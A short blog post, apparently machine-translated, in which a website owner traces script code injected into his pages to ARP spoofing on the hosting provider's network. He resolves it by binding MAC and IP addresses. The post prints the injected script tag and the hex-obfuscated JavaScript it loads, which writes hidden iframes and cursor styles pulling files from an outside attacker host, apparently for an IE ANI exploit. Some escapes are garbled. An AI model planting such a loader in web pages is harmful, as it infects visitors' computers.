When I found my website last night, I had a bunch of JS code in front of the page code HTML. Just started to think that the site was black, hurriedly to the server to see if all files with this string of JS code, search results are not, and the server did not find traces of intrusion.
<script src=http://fuck.ns2go.com/dir/index_pic/1.js></script>
So can only start from this code, I download this JS development discovery is the following section of code:
Copy Code code as follows:
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74" ["\x77\x72\x69\x74\x65\x6c\x6e"] ("\x3c\x44\x49\x56 \x73\x74\x79\x6c\ x65\x3d\ "\x43\x55\x52\x53\x4f\x52\x3a \x75\x72\x6c\x28\ ' \x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\ X32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x31\x2e\x67\x69\x66\ ' \x29\ ' x3e ");
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74" ["\x77\x72\x69\x74\x65\x6c\x6e"] ("\x3c\x44\x49\x56 \x73\x74\x79\x6c\ x65\x3d\ "\x43\x55\x52\x53\x4f\x52\x3a \x75\x72\x6c\x28\ ' \x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\ X32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x32\x2e\x67\x69\x66\ ' \x29\ ' x3e\x3c\/\x44\x49\x56\x3e\x3c\/\x44\x49\x56\x3e ");
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74" ["\x77\x72\x69\x74\x65\x6c\x6e"] ("\x3c\x69\x66\x72\x61\x6d\x65 \x73\ X72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\ X69\X6E\X64\X65\X78\X5F\X70\X69\X63\/\X30\X36\X30\X31\X34\X2E\X68\X74\X6D \x77\x69\x64\x74\x68\x3d\x31 \x68\x65\ x69\x67\x68\x74\x3d\x31\x3e\x3c\/\x69\x66\x72\x61\x6d\x65\x3e ");
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74" ["\x77\x72\x69\x74\x65\x6c\x6e"] ("\x3c\x69\x66\x72\x61\x6d\x65 \x73\ X72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\ X69\X6E\X64\X65\X78\X5F\X70\X69\X63\/\X74\X6A\X2E\X68\X74\X6D \x77\x69\x64\x74\x68\x3d\x30 \x68\x65\x69\x67\x68\ x74\x3d\x30\x3e\x3c\/\x69\x66\x72\x61\x6d\x65\x3e ")
A search on Google found that someone had found the same thing. http://0e2.net/post/676.html
Read this article to understand that the server is not black, but the server in the computer room intranet has Trojan virus host in the ARP deception.
These Trojans capture the messages sent out by my server, tampered with the contents of the message, in the HTML header to add the previous Trojan virus code. And then forwarded to the user host accessing my site. This trojan is aimed at IE ANI loophole, Microsoft user's computer to quickly upgrade patching.
The final question is how to get my server to prevent ARP spoofing. Call the computer room, technicians let us bind the Mac and IP address, the problem is finally resolved.
About ARP spoofing related knowledge:
Http://zhidao.baidu.com/question/7980952.html?si=1
